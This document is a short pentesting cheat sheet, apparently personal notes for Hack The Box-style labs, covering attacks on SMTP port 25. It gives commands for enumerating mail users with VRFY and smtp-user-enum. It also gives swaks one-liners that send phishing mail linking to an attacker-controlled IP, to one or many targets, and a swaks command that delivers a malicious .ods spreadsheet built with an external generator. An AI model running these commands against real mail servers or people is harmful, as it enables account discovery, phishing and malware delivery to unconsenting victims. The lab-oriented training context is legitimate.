25 SMTP

User Enumeration

# Manually
>> VRFY victim-user

# Using Tool (for multiple user)
smtpenum -U usernames.txt -t $ip
smtp-user-enum -U usernames.txt -t $ip

Email Phishing

RFI / SSRF

# To Single target
swaks --to target@mail.htb --from test@mail.htb --header "Subject: test" --body "please click here http://10.10.14.42/" --server 10.10.10.197        [117/282]

# To Multiple targets
swaks --to $(cat emails | tr '\n' ',' | less) --from test@sneakymailer.htb --header "Subject: test" --body "please click here http://10.10.14.42/" --server 10.10.10.197        [117/282]

Attaching Malicious File (.ods)

Generate file - use below Tool

MMG-LO/mmg-ods.py at main · 0bfxgh0st/MMG-LOGitHub

After generating, use it as attachment while sending the mail

sudo swaks -t mailadmin@localhost --from jonas@localhost --attach @file.ods --server $ip --body 'Please check this spreadsheet' --header 'Subject: Please check this spreadsheet'